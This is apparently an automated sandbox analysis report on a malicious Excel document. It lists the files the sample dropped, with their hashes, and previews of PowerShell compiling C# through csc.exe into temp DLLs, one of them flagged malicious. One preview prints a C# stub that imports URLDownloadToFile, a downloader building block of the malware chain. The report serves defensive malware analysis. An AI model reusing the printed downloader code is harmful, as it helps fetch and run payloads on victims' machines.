                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w;g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....t.....t.......................................... =.....P ......O.........U.....\.....c.....e.....n...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.03
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):866
                                                                                                                                                  Entropy (8bit):5.332200429023354
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AId3ka6KzkMEokDKaMD5DqBVKVrdFAMBJTH:Akka60kMEokDKdDcVKdBJj
                                                                                                                                                  MD5:5058C2FA1959818C366D52184FC871BE
                                                                                                                                                  SHA1:37BD07F655EFB5DB705AECF8914E9436F70A784C
                                                                                                                                                  SHA-256:3B7FB35474A5F58BDC60A6340C1353B750ABA0B513E9D78EE57FE53D83073D53
                                                                                                                                                  SHA-512:741B9B9C9F1AD95C47DD4E10E918B5FC288495598899579CDCF62F181FAD1204BBBB2E769BEA5814FEB210F20CF95A6B6B7CFD3016F9D3BF74892F259C9A2602
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.0965316496142
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfak7YnqqLPN5Dlq5J:+RI+ycuZhNtakSLPNnqX
                                                                                                                                                  MD5:BF6099361F9196E2BF6F8F045A8A7AD8
                                                                                                                                                  SHA1:831C998A2F194DD92D479E1D6650FB815947D721
                                                                                                                                                  SHA-256:1D127D8B7B75B016FD7FD1F60C21D43CC5F4D66A94D81E3407C7345C207CE300
                                                                                                                                                  SHA-512:8CA25EA84185F75A96EDB5C75F63DE7903DE1D615BFCF1DD80455358957F587DE60966C67A6CC32B898FE3E878C35A7CDBCFEE16B9ADC442472CE260FF256443
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.3.w.l.z.t.s.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.3.w.l.z.t.s.z...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.7798653713156546
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                                                                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                                                                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                                                                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                                                                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):20480
                                                                                                                                                  Entropy (8bit):1.3870145383915669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                                                                                                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                                                                                                                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                                                                                                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                                                                                                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):77824
                                                                                                                                                  Entropy (8bit):1.133993246026424
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                                                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                                                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                                                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                                                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):24052
                                                                                                                                                  Entropy (8bit):7.652425367216495
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EaNYaTXe5BPJ2cpRYnyAt3TtsVaWtmGJA8+6qdPGlDLRoucPQFVJG:Ea6aje5BP7RMYt9h44wQFV4
                                                                                                                                                  MD5:AE24ADB29E22854D176245019B60E937
                                                                                                                                                  SHA1:28E9F74782AA0D138EE52E3191248F827BF27A1D
                                                                                                                                                  SHA-256:5BF5C455288A0B5184B23744506939B604BF402E346AFAE18269BBE888412129
                                                                                                                                                  SHA-512:10AE2624E874CBA663DA08AA0C0FEBE19421FD01F72D54957F22A028A58A33BD4078C6A9CCA7CDAB94FC59030894BEA018141E6920AF4E926155C7EE49B6507D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:PK..........!.*.B.....@.......[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.N.0..W.."o.....U.aAaY...`.5~...3....3*(ME3.Dy..|..W[...hch.y........V.z../E...Q..h..P\..,.w.....[....R...+lb.._..."~.k...5....1....`....t..Qu...{%O6..z._.j.J.Y....`>.......g..S.e.. .-3.. bc(.jy..5P.L?.g..u......{.%b..ZP.N..s........G....s..6....`o.N0.........|.<FTM.=..k...7.N.4......p..sL(....@....N...,.s......C.Q........?........:.r...=;q.G....`..O...G.O.)..N...A...i.....o.......PK..........!...%S............_rels/.rels ...(.................................
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26
                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:gAWY3n:qY3n
                                                                                                                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 18 17:21:41 2024, 1st section name ".debug$S"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1328
                                                                                                                                                  Entropy (8bit):3.984108290385013
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Hee9ERjxVQdH34wKdNWI+ycuZhNtakSLPNnqSqd:oxqXKd41ulta3hqSK
                                                                                                                                                  MD5:9FD0D41E7DD1768F21CC6A7C6D508F17
                                                                                                                                                  SHA1:CE1D48A811DAFC51593D72D8D5345E8422A26532
                                                                                                                                                  SHA-256:2553B0CEA901057D09BBD2918E7A5B02E25250DF1F778480675B8BA737B89A10
                                                                                                                                                  SHA-512:C5E4A676D465E6E926D79D45936275B95FB35DD3B7FBEF5E61F789D466AC5700B1BE438080A9D044BF6C386E81ABFE7462FA584D4AD57157AD8CCBDE96A2C1A1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L....w;g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\03wlztsz\CSC280AB7AC39534067B2898716E8B346.TMP..................`.6....o..Z.z...........4.......C:\Users\user\AppData\Local\Temp\RES2B07.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.3.w.l.z.t.s.z...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 18 17:22:04 2024, 1st section name ".debug$S"
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1328
                                                                                                                                                  Entropy (8bit):3.995504907446259
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Hpe9E2UEiodHdDwKdNWI+ycuZhNgzGakS7zXPNnqSqd:lTA9UKd41ulgKa37xqSK
                                                                                                                                                  MD5:7B03516520CB8E92C1D2CEF2F0BE933A
                                                                                                                                                  SHA1:478E69CCC10526DB4F220D9025EB80821ECFD5E7
                                                                                                                                                  SHA-256:F34D6730EDF09F2ABE725ACC91DA77A46B6A936F2D6B8AF02801C44E24BA1380
                                                                                                                                                  SHA-512:BFA6BF9620D7E9D0E1D96667CAC1FF53A3B9CBF82EAFB1B823955E61D2AA89450C3857DD0E48027C0045A9BC351EA6842023B9B520FA2FB04CC5B135376E0058
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:L....w;g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\mffkkngw\CSC9E50345C585C4EFF867E1FFD2050D1A6.TMP...............G...W.p.D.?.+...........4.......C:\Users\user\AppData\Local\Temp\RES845C.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.f.f.k.k.n.g.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:1
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:MSVC .res
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):652
                                                                                                                                                  Entropy (8bit):3.10168822136036
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryezGak7Ynqq7zXPN5Dlq5J:+RI+ycuZhNgzGakS7zXPNnqX
                                                                                                                                                  MD5:47B7140357CF70CB44A73FF0BE8B2BCB
                                                                                                                                                  SHA1:C73C2C7057A531A6F50570A9DD7DA6834EF98437
                                                                                                                                                  SHA-256:8C5A82810FE54CBBDF6A1CF55FE18032C19012F34AD104D83DDABFF17B9D2BBE
                                                                                                                                                  SHA-512:2308B5DF757F0CA75E08918EDC7121F75ACD1C662DB4CD462F3EFC265780648B12C38F19B852CC2F152EAA234CA8077A667811AD18463E7504D63D083D581FB0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.f.f.k.k.n.g.w...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.f.f.k.k.n.g.w...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):472
                                                                                                                                                  Entropy (8bit):3.7725208644149166
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:V/DsYLDS81zuE40zmMm/nQXReKJ8SRHy4H+J4EEJ4rNgueIy:V/DTLDfuER5XfHCzETueIy
                                                                                                                                                  MD5:1A212B8A44924D84EEBA108F2409B5E8
                                                                                                                                                  SHA1:B19066FAB9C3329CD206958DACEE65A08607586B
                                                                                                                                                  SHA-256:977B687CCDCAEA25B4AFDD04DBAC19BF12B31AFAD4AE226D7B7E5ED5CABCF073
                                                                                                                                                  SHA-512:4D4BBADA1880CE68CEEAFF34A1D412350F715C0F5F741F7F47692549280DC92738881CE1FFF7BBCD472610A63D99DED94CA713CC859B330A07D13DF2313EA453
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace lxsBtSMPv.{. public class dzTk. {. [DllImport("UrlMON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dnHrLo,string jlWMht,string L,uint UDwRBXCS,IntPtr qEKvq);.. }..}.
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):369
                                                                                                                                                  Entropy (8bit):5.260265794996971
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f4Frzxs7+AEszIP23f4FGn:p37Lvkmb6KzQ1WZEoQwn
                                                                                                                                                  MD5:ED70F226984C80BB70F2CACFB9893B88
                                                                                                                                                  SHA1:DD1121B0C4C320C7BEBBD9BFAB3E5A700B337F56
                                                                                                                                                  SHA-256:47C246923AAEF117A8C47267912DF193F0F93E0DC4A1DBB1C87400D965F020F6
                                                                                                                                                  SHA-512:DF6F5765BB01BBB976ADAFC95A44A70D1D61F4087781821377748F6A00FCC673884FD9D65A256CD3A3E7808C5858C43497947262E105FF68407C3D0A7414E143
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.0.cs"
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3072
                                                                                                                                                  Entropy (8bit):2.821607690802324
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:etGSjPBu5exl8sMQgkg4qvmStZwtkZf+mAjcUWI+ycuZhNgzGakS7zXPNnq:60sx+FT4CmStZXJZAA31ulgKa37xq
                                                                                                                                                  MD5:1B6E8F694BB6D88E2F456376B8B75F76
                                                                                                                                                  SHA1:4873CB64E792E8E8429381C3DDCFA87E8ABCE277
                                                                                                                                                  SHA-256:5D585C1C16C3D6B539B86BF75496F5303B589B69DE69DE64CE5B29A3376222A5
                                                                                                                                                  SHA-512:2A6A0F0A473A8B8B2AA2012D2D0DB16A2EE35318B3252D53667342E045BF1E2BBCD984E6CC22024CF637E09888681380F0DFD401512F6BB0CEB6D94059F0FB91
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....w;g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....t.....t.......................................... =.....P ......O.........U.....\.....c.....e.....n...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.mf
                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):866
                                                                                                                                                  Entropy (8bit):5.3362011001621985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:AId3ka6KzPEoDuKaMD5DqBVKVrdFAMBJTH:Akka60PEoiKdDcVKdBJj
                                                                                                                                                  MD5:1F3E6F89655D2546399FD2611B39E141
                                                                                                                                                  SHA1:84D80B88401E51CFABC55E6E1D7E923F4D6E3C72
                                                                                                                                                  SHA-256:80D494FFF69851A5BA4656E991BFB165BDAA3BC6CC3221A96E916DC1E8C71AC9
                                                                                                                                                  SHA-512:16B0FAEDBB02BA6FB81A0CF44D2668232FC572AA5046769926B6DB8AEF504AB9B6C43F52FE0C10B956292212DEF7A58BD445458097268BF0538B671FADFB6AD9
